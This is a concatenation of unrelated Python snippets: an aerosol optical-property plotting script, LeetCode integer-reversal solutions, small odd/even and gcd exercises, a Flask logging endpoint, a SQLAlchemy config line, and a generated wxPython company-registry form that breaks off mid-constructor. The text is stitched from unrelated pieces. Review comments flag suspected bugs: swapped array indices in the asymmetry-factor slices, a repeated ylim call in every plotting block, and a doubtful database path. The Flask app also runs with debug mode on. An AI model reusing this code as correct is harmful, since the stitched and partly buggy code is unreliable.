g_3im_orig = fh_3im.variables['g'][:][:][:]
g_2im_orig = fh_2im.variables['g'][:][:][:]
g_3cs_orig = fh_3cs.variables['g'][:][:][:]
g_2cs_orig = fh_2cs.variables['g'][:][:][:]

# Calculate the index arrays for the picked RH / sulfate / OC values.
rhpkd = np.array([30,60,80,90,94])
rhpkdind = [np.where( rh_orig == s )[0].item() for s in rhpkd]
volspkdind = np.where( vols_orig == volspkd )[0].item()
volopkd = np.array([70,80,90,94,98])
volopkdind = [np.where( volo_orig == s )[0].item() for s in volopkd]
print 'vol_OC = '+str(volo_orig[volopkdind])
print 'vol_sulfate = '+str(vols_orig[volspkdind])
print 'rh = '+str(rh_orig[rhpkdind])

# Slice each field down to (picked OC fractions) x (picked RH values).
mec_3im_t = mec_3im_orig[wlpkdind,volspkdind,volopkdind,:]
mec_3im = mec_3im_t[:,rhpkdind]
mec_2im_t = mec_2im_orig[wlpkdind,volspkdind,volopkdind,:]
mec_2im = mec_2im_t[:,rhpkdind]
mec_3cs_t = mec_3cs_orig[wlpkdind,volspkdind,volopkdind,:]
mec_3cs = mec_3cs_t[:,rhpkdind]
mec_2cs_t = mec_2cs_orig[wlpkdind,volspkdind,volopkdind,:]
mec_2cs = mec_2cs_t[:,rhpkdind]
units = fh_3im.variables['beta_e'].units
ssa_3im_t = ssa_3im_orig[wlpkdind,volspkdind,volopkdind,:]
ssa_3im = ssa_3im_t[:,rhpkdind]
ssa_2im_t = ssa_2im_orig[wlpkdind,volspkdind,volopkdind,:]
ssa_2im = ssa_2im_t[:,rhpkdind]
ssa_3cs_t = ssa_3cs_orig[wlpkdind,volspkdind,volopkdind,:]
ssa_3cs = ssa_3cs_t[:,rhpkdind]
ssa_2cs_t = ssa_2cs_orig[wlpkdind,volspkdind,volopkdind,:]
ssa_2cs = ssa_2cs_t[:,rhpkdind]
# NOTE(review): the g_* slices below swap volopkdind/volspkdind relative to
# the mec_*/ssa_* slices above (there the order is wl, vols, volo, rh).
# Unless the 'g' variable's dimensions really are ordered differently, this
# looks like a copy-paste index-order bug — confirm against the netCDF
# metadata.
g_3im_t = g_3im_orig[wlpkdind,volopkdind,volspkdind,:]
g_3im = g_3im_t[:,rhpkdind]
g_2im_t = g_2im_orig[wlpkdind,volopkdind,volspkdind,:]
g_2im = g_2im_t[:,rhpkdind]
g_3cs_t = g_3cs_orig[wlpkdind,volopkdind,volspkdind,:]
g_3cs = g_3cs_t[:,rhpkdind]
g_2cs_t = g_2cs_orig[wlpkdind,volopkdind,volspkdind,:]
g_2cs = g_2cs_t[:,rhpkdind]
fh_3im.close()
fh_2im.close()
fh_3cs.close()
fh_2cs.close()
# Plot: six scatter panels comparing 2-species vs 3-species optics, with a
# 1:1 reference line in each; marker size encodes OC fraction, color encodes RH.
import matplotlib.pyplot as plt
vol = volo_orig[volopkdind]
rh = rh_orig[rhpkdind]
area_t = 15 * (vol/40.)**2
area = np.zeros((vol.size,rh.size),float)
for i in np.arange(rh.size):
    area[:,i] = area_t
color_t = rh
colors = np.zeros((vol.size,rh.size),float)
for i in np.arange(vol.size):
    colors[i,:] = color_t
fig = plt.figure(figsize=(6,9))
#fig,axes = plt.subplots(nrows=3,ncols=2)

# Panel 1: mass extinction coefficient, homogeneous (internal) mixing.
ax1=plt.subplot(3,2,1)
ax1.scatter(mec_2im, mec_3im, c=colors, cmap='RdYlBu', s=area, alpha=0.8,
            linewidths=0.5, marker='o')
ax1.set_xlim([2, 18])
ax1.set_ylim([2, 18])
# NOTE(review): np.max([plt.ylim(), plt.ylim()]) repeats ylim — the first was
# presumably meant to be xlim.  The same copy-paste appears in every lims
# block in this script; harmless while x and y limits are identical, confirm.
lims = [
    np.min([plt.xlim(), plt.ylim()]),
    np.max([plt.ylim(), plt.ylim()]),
]
ax1.plot(lims,lims,'k-',alpha=0.75,zorder=0)
ax1.set_ylabel('Homo. Mixing: BC+SUL+OC', fontsize=8)
ax1.set_title('Mass Extinction Coefficient ($m^2/g$)', fontsize=10)
ax1.set_xlabel('Homo. Mixing: BC+SUL only', fontsize=8)
ax1.set_aspect('equal')
plt.grid(True)
plt.tick_params(labelsize=7)

# Panel 2: mass extinction coefficient, core-shell mixing.
plt.subplot(3,2,2)
plt.scatter(mec_2cs, mec_3cs, c=colors, cmap='RdYlBu', s=area, alpha=0.8, linewidths=0.5, marker='v')
plt.ylabel('Core-shell Mixing: BC+SUL+OC', fontsize=8)
plt.xlabel('Core-shel Mixing: BC+SUL only', fontsize=8)
plt.xlim([2, 18])
plt.ylim([2, 18])
lims = [
    np.min([plt.xlim(), plt.ylim()]),
    np.max([plt.ylim(), plt.ylim()]),
]
plt.plot(lims,lims,'k-',alpha=0.75,zorder=0)
plt.grid(True)
plt.tick_params(labelsize=7)
ax2 = plt.subplot(3,2,2)
ax2.set_aspect('equal')

# Panel 3: single scattering albedo, homogeneous mixing.
plt.subplot(3,2,3)
plt.scatter(ssa_2im, ssa_3im, c=colors, cmap='RdYlBu', s=area, alpha=0.8, linewidths=0.5, marker='o')
plt.xlim([.3, 1.])
plt.ylim([.3, 1.])
lims = [
    np.min([plt.xlim(), plt.ylim()]),
    np.max([plt.ylim(), plt.ylim()]),
]
plt.plot(lims,lims,'k-',alpha=0.75,zorder=0)
plt.ylabel('Homo. Mixing: BC+SUL+OC', fontsize=8)
plt.xlabel('Homo. Mixing: BC+SUL only', fontsize=8)
plt.title('Single Scattering Albedo', fontsize=10)
plt.grid(True)
plt.tick_params(labelsize=7)
ax3 = plt.subplot(3,2,3)
ax3.set_aspect('equal')

# Panel 4: single scattering albedo, core-shell mixing.
plt.subplot(3,2,4)
plt.scatter(ssa_2cs, ssa_3cs, c=colors, cmap='RdYlBu', s=area, alpha=0.8,
            linewidths=0.5, marker='v')
plt.xlim([.3, 1.])
plt.ylim([.3, 1.])
lims = [
    np.min([plt.xlim(), plt.ylim()]),
    np.max([plt.ylim(), plt.ylim()]),
]
plt.plot(lims,lims,'k-',alpha=0.75,zorder=0)
plt.ylabel('Core-shell Mixing: BC+SUL+OC', fontsize=8)
plt.xlabel('Core-shell Mixing: BC+SUL only', fontsize=8)
plt.grid(True)
plt.tick_params(labelsize=7)
ax4 = plt.subplot(3,2,4)
ax4.set_aspect('equal')

# Panel 5: asymmetry factor, homogeneous mixing.
plt.subplot(3,2,5)
plt.scatter(g_2im, g_3im, c=colors, cmap='RdYlBu', s=area, alpha=0.8,
            linewidths=0.5, marker='o')
plt.xlim([0.35, 0.85])
plt.ylim([0.35, 0.85])
lims = [
    np.min([plt.xlim(), plt.ylim()]),
    np.max([plt.ylim(), plt.ylim()]),
]
plt.plot(lims,lims,'k-',alpha=0.75,zorder=0)
plt.ylabel('Homo. Mixing: BC+SUL+OC', fontsize=8)
plt.xlabel('Homo. Mixing: BC+SUL only', fontsize=8)
plt.title('Asymmetry Factor', fontsize=10)
plt.grid(True)
plt.tick_params(labelsize=7)
ax5 = plt.subplot(3,2,5)
ax5.set_aspect('equal')

# Panel 6: asymmetry factor, core-shell mixing (keeps the mappable for the
# shared colorbar below).
plt.subplot(3,2,6)
im = plt.scatter(g_2cs, g_3cs, c=colors, cmap='RdYlBu', s=area, alpha=0.8,
                 linewidths=0.5, marker='v')
plt.xlim([0.35, 0.85])
plt.ylim([0.35, 0.85])
lims = [
    np.min([plt.xlim(), plt.ylim()]),
    np.max([plt.ylim(), plt.ylim()]),
]
plt.tick_params(labelsize=7)
plt.plot(lims,lims,'k-',alpha=0.75,zorder=0)
plt.ylabel('Core-shell Mixing: BC+SUL+OC', fontsize=8)
plt.xlabel('Core-shell Mixing: BC+SUL only', fontsize=8)
plt.grid(True)
ax6 = plt.subplot(3,2,6)
ax6.set_aspect('equal')

# Shared horizontal RH colorbar along the bottom of the figure.
plt.tight_layout()
fig.subplots_adjust(bottom=0.13)
cax = fig.add_axes([0.13, 0.05, 0.8, 0.015])
cbar = fig.colorbar(im,cax=cax,ticks=rhpkd,orientation='horizontal')
cbar.solids.set_edgecolor("face")
cbar.set_label("RH (%)")
plt.savefig('radppt_3spec_'+str(volspkd)+'%sul.pdf',format='pdf')
#plt.show()
|
class Solution:
    """LeetCode 7 "Reverse Integer" via string reversal."""

    def reverse(self, x):
        """Reverse the decimal digits of x; return 0 if the result falls
        outside the signed 32-bit range [-2**31, 2**31 - 1]."""
        # fixed: removed a stray debug print(0.75 % 10) left in the original.
        a = str(x)
        if a[0] == '-':
            # Reverse and drop the '-' that ends up at the back.
            b = a[::-1]
            result = int(b[:-1]) * -1
            if result < -2147483648:
                return 0
            return result
        result = int(a[::-1])
        # fixed off-by-one: the positive limit is 2**31 - 1 (2147483647);
        # the original compared against 2147483648, wrongly accepting it.
        if result > 2147483647:
            return 0
        return result
class Solution2:
    """LeetCode 7 "Reverse Integer" via digit-by-digit arithmetic."""

    def reverse(self, x: int) -> int:
        """Reverse the decimal digits of x; return 0 if the result falls
        outside the signed 32-bit range [-2**31, 2**31 - 1]."""
        if x == 0:
            return 0
        neg = False
        if x < 0:
            neg = True
            x *= -1
        s = ''
        while x > 0:
            s += str(x % 10)
            x = x // 10
        s = int(s)
        if neg:
            # Lower bound is exactly -2**31, so 2**31 itself is allowed here.
            if s > 2 ** 31:
                return 0
            return s * -1
        # fixed: the positive bound is 2**31 - 1; the original `s > 2**31`
        # wrongly accepted 2**31 (2147483648) as a valid positive result.
        if s > 2 ** 31 - 1:
            return 0
        return s
|
#WAP to accept a number and check if it's even or odd without using arithmetic operators
def IsOdd(num):
    """Report whether num is odd using only a bitwise test (no arithmetic).

    The lowest bit of an integer is set exactly when the integer is odd.
    """
    return (num & 1) == 1
def main():
    """Prompt for an integer and report whether it is odd."""
    # fixed: eval(input(...)) executes arbitrary user-supplied code — a
    # code-injection hole; int() parses the number safely and raises
    # ValueError on non-numeric input.
    inputNum = int(input('Please enter a number: '))
    print('Number is Odd: ', IsOdd(inputNum))

if __name__ == '__main__':
    main()
# Find the greatest common divisor of two numbers using recursion.
def gcd(n1, n2):
    """Return the greatest common divisor of n1 and n2 (Euclid's algorithm).

    Same results as the original for positive inputs, but the classic
    `gcd(a, 0) == a` base case also fixes the ZeroDivisionError the original
    raised when either argument was 0.
    """
    if n2 == 0:
        return n1
    return gcd(n2, n1 % n2)

print(gcd(24, 54))
#!remote-logger/bin/python
from flask import Flask, request, abort, jsonify
from collector_logger import logger
app = Flask(__name__)
@app.route('/')
def index():
    """Health-check style root endpoint."""
    return "Hello, World!"
@app.route('/log', methods=['POST'])
def add_record():
    """Accept a JSON body with a 'content' field and write it to the log.

    Returns 204 with an empty body on success; aborts with 400 (handled by
    bad_req_body below) when the payload is missing or lacks 'content'.
    """
    if not request.json or 'content' not in request.json:
        abort(400)
    content = request.json['content']
    logger.info(content)
    return '', 204
@app.errorhandler(400)
def bad_req_body(error):
    """Render 400 errors as JSON instead of Flask's default HTML page."""
    return jsonify({'message': 'No content!'}), 400
if __name__ == '__main__':
    # NOTE(review): debug=True enables the Werkzeug debugger/reloader — fine
    # for local development, but it must not be enabled in production.
    app.run(port=5880,
            debug=True)
import os
from flask import g, current_app
# ...
# Point SQLAlchemy at a SQLite file inside the application directory.
# NOTE(review): `g.app` is not a standard Flask attribute (g carries
# per-request data) — presumably `current_app.root_path` was intended.
# Also check the slash count: root_path is already absolute, so
# 'sqlite:////' + '/abs/path' yields five slashes; 'sqlite:///' is the
# usual prefix when joining an absolute path.  Confirm both.
current_app.config['SQLALCHEMY_DATABASE_URI'] = \
    'sqlite:////' + os.path.join(g.app.root_path, 'data.db')
# -*- coding: utf-8 -*-
###########################################################################
## Python code generated with wxFormBuilder (version Jun 17 2015)
## http://www.wxformbuilder.org/
##
## PLEASE DO "NOT" EDIT THIS FILE!
###########################################################################
import wx
import wx.xrc
import wx.grid
###########################################################################
## Class TEREMP
###########################################################################
class TEREMP ( wx.Frame ):
    """wxFormBuilder-generated frame "Cadastro de Empresas" (company registry).

    Builds a toolbar with CRUD-style actions, a header row (code, name,
    type, status), and a notebook with pages for basic data,
    communication, fiscal data and the partner ("sócios") table.  All
    event handlers are virtual -- a derived class overrides them.
    This file is generated; keep edits to comments only.
    """

    def __init__( self, parent ):
        """Construct the full widget hierarchy; no business logic here."""
        wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Cadastro de Empresas", pos = wx.DefaultPosition, size = wx.Size( 1064,730 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )

        self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )

        # Main toolbar: find / add / edit | save / cancel | exit.
        self.tb_geral = self.CreateToolBar( 0, wx.ID_ANY )
        self.bt_buscar = self.tb_geral.AddLabelTool( wx.ID_FIND, u"Localizar registro", wx.Bitmap( u"icons/ac_buscar_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
        self.bt_adicionar = self.tb_geral.AddLabelTool( wx.ID_ADD, u"Novo", wx.Bitmap( u"icons/ac_adicionar_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
        self.bt_editar = self.tb_geral.AddLabelTool( wx.ID_EDIT, u"Alterar registro", wx.Bitmap( u"icons/ac_editar_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
        self.tb_geral.AddSeparator()
        self.bt_confirmar = self.tb_geral.AddLabelTool( wx.ID_APPLY, u"Salvar modificações", wx.Bitmap( u"icons/ac_confirmar_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
        self.bt_cancelar = self.tb_geral.AddLabelTool( wx.ID_ABORT, u"Cancelar alterações", wx.Bitmap( u"icons/ac_cancelar_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
        self.tb_geral.AddSeparator()
        self.bt_sair = self.tb_geral.AddLabelTool( wx.ID_CLOSE, u"tool", wx.Bitmap( u"icons/ac_sair_32x32.png", wx.BITMAP_TYPE_ANY ), wx.NullBitmap, wx.ITEM_NORMAL, wx.EmptyString, wx.EmptyString, None )
        self.tb_geral.Realize()

        lay_corpo = wx.BoxSizer( wx.VERTICAL )

        # Header row: record code, resolved name, type (PF/PJ) and status.
        lay_cabecalho = wx.BoxSizer( wx.HORIZONTAL )
        self.lb_codigo = wx.StaticText( self, wx.ID_ANY, u"Código:", wx.DefaultPosition, wx.Size( 60,26 ), 0 )
        self.lb_codigo.Wrap( -1 )
        lay_cabecalho.Add( self.lb_codigo, 0, wx.ALL, 5 )
        self.tc_codigo = wx.TextCtrl( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0 )
        lay_cabecalho.Add( self.tc_codigo, 0, wx.ALL, 5 )
        self.lb_nome = wx.StaticText( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 300,26 ), 0 )
        self.lb_nome.Wrap( -1 )
        self.lb_nome.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_HIGHLIGHTTEXT ) )
        lay_cabecalho.Add( self.lb_nome, 0, wx.ALL, 5 )
        self.lb_tipo = wx.StaticText( self, wx.ID_ANY, u"Tipo:", wx.DefaultPosition, wx.Size( 100,26 ), wx.ALIGN_RIGHT )
        self.lb_tipo.Wrap( -1 )
        lay_cabecalho.Add( self.lb_tipo, 0, wx.ALL, 5 )
        cb_tipoChoices = [ u"PF", u"PJ" ]
        self.cb_tipo = wx.ComboBox( self, wx.ID_ANY, u"PF", wx.DefaultPosition, wx.DefaultSize, cb_tipoChoices, 0 )
        self.cb_tipo.Enable( False )
        lay_cabecalho.Add( self.cb_tipo, 0, wx.ALL, 5 )
        self.lb_situacao = wx.StaticText( self, wx.ID_ANY, u"Situação:", wx.DefaultPosition, wx.Size( 100,-1 ), wx.ALIGN_RIGHT )
        self.lb_situacao.Wrap( -1 )
        lay_cabecalho.Add( self.lb_situacao, 0, wx.ALL, 5 )
        cb_situacaoChoices = [ u"Ativo", u"Análise", u"Bloqueado", u"Saneamento", u"Cancelado" ]
        self.cb_situacao = wx.ComboBox( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, cb_situacaoChoices, 0 )
        self.cb_situacao.Enable( False )
        lay_cabecalho.Add( self.cb_situacao, 0, wx.ALL, 5 )
        lay_corpo.Add( lay_cabecalho, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 )

        # Notebook holding the record's tabs.
        lay_guias = wx.BoxSizer( wx.VERTICAL )
        self.nb_dados = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )

        # --- Tab 1: "Dados Básicos" (cadastral info / characteristics / registries)
        self.pn_dados_basicos = wx.Panel( self.nb_dados, wx.ID_ANY, wx.DefaultPosition, wx.Size( -1,-1 ), 0 )
        lay_dados_basicos = wx.BoxSizer( wx.VERTICAL )
        lay_basico_dados1 = wx.BoxSizer( wx.HORIZONTAL )
        lay_cadastrais = wx.StaticBoxSizer( wx.StaticBox( self.pn_dados_basicos, wx.ID_ANY, u"Informações Cadastrais" ), wx.HORIZONTAL )
        lay_cad_lab1 = wx.BoxSizer( wx.VERTICAL )
        self.lb_nome_formal = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Nome formal:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_nome_formal.Wrap( -1 )
        lay_cad_lab1.Add( self.lb_nome_formal, 0, wx.ALL, 5 )
        self.lb_nome_alternativo = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Nome alternativo:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_nome_alternativo.Wrap( -1 )
        lay_cad_lab1.Add( self.lb_nome_alternativo, 0, wx.ALL, 5 )
        self.lb_logradouro = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Logradouro:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_logradouro.Wrap( -1 )
        lay_cad_lab1.Add( self.lb_logradouro, 0, wx.ALL, 5 )
        self.lb_numero = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Número:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_numero.Wrap( -1 )
        lay_cad_lab1.Add( self.lb_numero, 0, wx.ALL, 5 )
        self.lb_bairro = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Bairro:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_bairro.Wrap( -1 )
        lay_cad_lab1.Add( self.lb_bairro, 0, wx.ALL, 5 )
        self.lb_municipio = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Município:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_municipio.Wrap( -1 )
        lay_cad_lab1.Add( self.lb_municipio, 0, wx.ALL, 5 )
        self.lb_estado = wx.StaticText( lay_cadastrais.GetStaticBox(), wx.ID_ANY, u"Estado:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_estado.Wrap( -1 )
        lay_cad_lab1.Add( self.lb_estado, 0, wx.ALL, 5 )
        lay_cadastrais.Add( lay_cad_lab1, 0, wx.EXPAND, 5 )
        lay_cad_text1 = wx.BoxSizer( wx.VERTICAL )
        self.tc_nome_formal = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 400,26 ), 0 )
        self.tc_nome_formal.Enable( False )
        lay_cad_text1.Add( self.tc_nome_formal, 0, wx.ALL, 5 )
        self.tc_nome_alternativo = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 400,26 ), 0 )
        self.tc_nome_alternativo.Enable( False )
        lay_cad_text1.Add( self.tc_nome_alternativo, 0, wx.ALL, 5 )
        self.tc_logradouro = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 400,26 ), 0 )
        self.tc_logradouro.Enable( False )
        lay_cad_text1.Add( self.tc_logradouro, 0, wx.ALL, 5 )
        self.tc_numero = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 90,26 ), 0 )
        self.tc_numero.Enable( False )
        lay_cad_text1.Add( self.tc_numero, 0, wx.ALL, 5 )
        self.tc_bairro = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 200,26 ), 0 )
        self.tc_bairro.Enable( False )
        lay_cad_text1.Add( self.tc_bairro, 0, wx.ALL, 5 )
        self.tc_municipio = wx.TextCtrl( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 400,26 ), 0 )
        self.tc_municipio.Enable( False )
        lay_cad_text1.Add( self.tc_municipio, 0, wx.ALL, 5 )
        cb_estadoChoices = [ u"MT", u"MS", u"MG", u"RJ", u"RG", u"RN", u"RR", u"ES", u"SP", u"SC", u"PR", u"PI", u"BA" ]
        self.cb_estado = wx.ComboBox( lay_cadastrais.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( 50,26 ), cb_estadoChoices, 0 )
        self.cb_estado.Enable( False )
        lay_cad_text1.Add( self.cb_estado, 0, wx.ALL, 5 )
        lay_cadastrais.Add( lay_cad_text1, 1, wx.EXPAND, 5 )
        lay_basico_dados1.Add( lay_cadastrais, 0, wx.EXPAND|wx.TOP, 0 )
        lay_caracteristicas = wx.StaticBoxSizer( wx.StaticBox( self.pn_dados_basicos, wx.ID_ANY, u"Características" ), wx.VERTICAL )
        lay_carac_lab1 = wx.BoxSizer( wx.VERTICAL )
        lay_caracteristicas.Add( lay_carac_lab1, 0, wx.EXPAND, 5 )
        lay_carac_text1 = wx.BoxSizer( wx.VERTICAL )
        lay_caracteristicas.Add( lay_carac_text1, 0, wx.EXPAND, 5 )
        lay_basico_dados1.Add( lay_caracteristicas, 1, wx.EXPAND, 5 )
        lay_dados_basicos.Add( lay_basico_dados1, 1, wx.EXPAND, 5 )
        lay_registros = wx.StaticBoxSizer( wx.StaticBox( self.pn_dados_basicos, wx.ID_ANY, u"Registros" ), wx.HORIZONTAL )
        lay_reg_lab1 = wx.BoxSizer( wx.VERTICAL )
        lay_registros.Add( lay_reg_lab1, 0, wx.EXPAND, 5 )
        lay_reg_lab2 = wx.BoxSizer( wx.VERTICAL )
        lay_registros.Add( lay_reg_lab2, 1, wx.EXPAND, 5 )
        lay_dados_basicos.Add( lay_registros, 1, wx.EXPAND, 5 )
        self.pn_dados_basicos.SetSizer( lay_dados_basicos )
        self.pn_dados_basicos.Layout()
        lay_dados_basicos.Fit( self.pn_dados_basicos )
        self.nb_dados.AddPage( self.pn_dados_basicos, u"Dados Básicos", True )

        # --- Tab 2: "Comunicação" (contacts / e-mail / addresses)
        self.pn_comunicacao = wx.Panel( self.nb_dados, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        lay_comunicacao = wx.BoxSizer( wx.VERTICAL )
        lay_contatos = wx.StaticBoxSizer( wx.StaticBox( self.pn_comunicacao, wx.ID_ANY, u"Contatos" ), wx.VERTICAL )
        lay_comunicacao.Add( lay_contatos, 1, wx.EXPAND|wx.TOP, 5 )
        bSizer8 = wx.BoxSizer( wx.HORIZONTAL )
        lay_email = wx.StaticBoxSizer( wx.StaticBox( self.pn_comunicacao, wx.ID_ANY, u"Correio eletrônico" ), wx.VERTICAL )
        bSizer8.Add( lay_email, 1, wx.EXPAND, 5 )
        lay_enderecos = wx.StaticBoxSizer( wx.StaticBox( self.pn_comunicacao, wx.ID_ANY, u"Endereços" ), wx.VERTICAL )
        bSizer8.Add( lay_enderecos, 1, wx.EXPAND, 5 )
        lay_comunicacao.Add( bSizer8, 1, wx.EXPAND, 5 )
        self.pn_comunicacao.SetSizer( lay_comunicacao )
        self.pn_comunicacao.Layout()
        lay_comunicacao.Fit( self.pn_comunicacao )
        self.nb_dados.AddPage( self.pn_comunicacao, u"Comunicação", False )

        # --- Tab 3: "Dados Fiscais" (empty placeholder panel)
        self.pn_fiscal = wx.Panel( self.nb_dados, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        self.nb_dados.AddPage( self.pn_fiscal, u"Dados Fiscais", False )

        # --- Tab 4: "Quadro Societário" (partners list + edit form + buttons)
        self.pn_socios = wx.Panel( self.nb_dados, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        lay_socios = wx.BoxSizer( wx.VERTICAL )
        self.pn_lista_socios = wx.Panel( self.pn_socios, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        bSizer20 = wx.BoxSizer( wx.VERTICAL )
        lay_total = wx.BoxSizer( wx.VERTICAL )
        lay_label = wx.BoxSizer( wx.HORIZONTAL )
        self.lb_quotas = wx.StaticText( self.pn_lista_socios, wx.ID_ANY, u"Total de Quotas", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_CENTRE )
        self.lb_quotas.Wrap( -1 )
        lay_label.Add( self.lb_quotas, 0, wx.ALL, 5 )
        self.lb_capital = wx.StaticText( self.pn_lista_socios, wx.ID_ANY, u"Capital Total", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_CENTRE )
        self.lb_capital.Wrap( -1 )
        lay_label.Add( self.lb_capital, 0, wx.ALL, 5 )
        lay_total.Add( lay_label, 1, wx.EXPAND, 5 )
        lay_campos = wx.BoxSizer( wx.HORIZONTAL )
        self.tc_quotas = wx.TextCtrl( self.pn_lista_socios, wx.ID_ANY, u"0.00", wx.DefaultPosition, wx.Size( 150,26 ), wx.TE_RIGHT )
        lay_campos.Add( self.tc_quotas, 0, wx.ALL, 5 )
        self.tc_capital = wx.TextCtrl( self.pn_lista_socios, wx.ID_ANY, u"0.00", wx.DefaultPosition, wx.Size( 150,26 ), wx.TE_RIGHT )
        lay_campos.Add( self.tc_capital, 0, wx.ALL, 5 )
        lay_total.Add( lay_campos, 1, wx.EXPAND, 5 )
        bSizer20.Add( lay_total, 0, wx.EXPAND, 5 )
        lay_tabela = wx.BoxSizer( wx.VERTICAL )
        self.gd_socios = wx.grid.Grid( self.pn_lista_socios, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 )

        # Grid (read-only, 8 columns)
        self.gd_socios.CreateGrid( 0, 8 )
        self.gd_socios.EnableEditing( False )
        self.gd_socios.EnableGridLines( False )
        self.gd_socios.EnableDragGridSize( False )
        self.gd_socios.SetMargins( 0, 0 )

        # Columns
        self.gd_socios.SetColSize( 0, 50 )
        self.gd_socios.SetColSize( 1, 50 )
        self.gd_socios.SetColSize( 2, 90 )
        self.gd_socios.SetColSize( 3, 400 )
        self.gd_socios.SetColSize( 4, 120 )
        self.gd_socios.SetColSize( 5, 100 )
        self.gd_socios.SetColSize( 6, 100 )
        self.gd_socios.SetColSize( 7, 100 )
        self.gd_socios.EnableDragColMove( False )
        self.gd_socios.EnableDragColSize( False )
        self.gd_socios.SetColLabelSize( 30 )
        self.gd_socios.SetColLabelAlignment( wx.ALIGN_CENTRE, wx.ALIGN_CENTRE )

        # Rows
        self.gd_socios.EnableDragRowSize( True )
        self.gd_socios.SetRowLabelSize( 30 )
        self.gd_socios.SetRowLabelAlignment( wx.ALIGN_CENTRE, wx.ALIGN_CENTRE )

        # Label Appearance

        # Cell Defaults
        self.gd_socios.SetDefaultCellAlignment( wx.ALIGN_LEFT, wx.ALIGN_TOP )
        lay_tabela.Add( self.gd_socios, 1, wx.EXPAND, 5 )
        bSizer20.Add( lay_tabela, 1, wx.EXPAND, 5 )
        self.pn_lista_socios.SetSizer( bSizer20 )
        self.pn_lista_socios.Layout()
        bSizer20.Fit( self.pn_lista_socios )
        lay_socios.Add( self.pn_lista_socios, 1, wx.EXPAND |wx.ALL, 5 )

        # Partner edit form; hidden until a record is opened for editing.
        self.pn_form_socios = wx.Panel( self.pn_socios, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
        self.pn_form_socios.Hide()

        lay_form_soc = wx.BoxSizer( wx.HORIZONTAL )
        lay_label_soc1 = wx.BoxSizer( wx.VERTICAL )
        self.lb_empresa = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Empresa:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_empresa.Wrap( -1 )
        lay_label_soc1.Add( self.lb_empresa, 0, wx.ALL, 5 )
        self.lb_soc_codigo = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Código:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_soc_codigo.Wrap( -1 )
        lay_label_soc1.Add( self.lb_soc_codigo, 0, wx.ALL, 5 )
        self.lb_soc_situacao = wx.StaticText( self.pn_form_socios, wx.ID_ANY, u"Situação:", wx.DefaultPosition, wx.Size( 150,26 ), wx.ALIGN_RIGHT )
        self.lb_soc_situacao.Wrap( -1 )
        lay_label_soc1.Add( self.lb_soc_situacao, 0, wx.ALL, 5 )
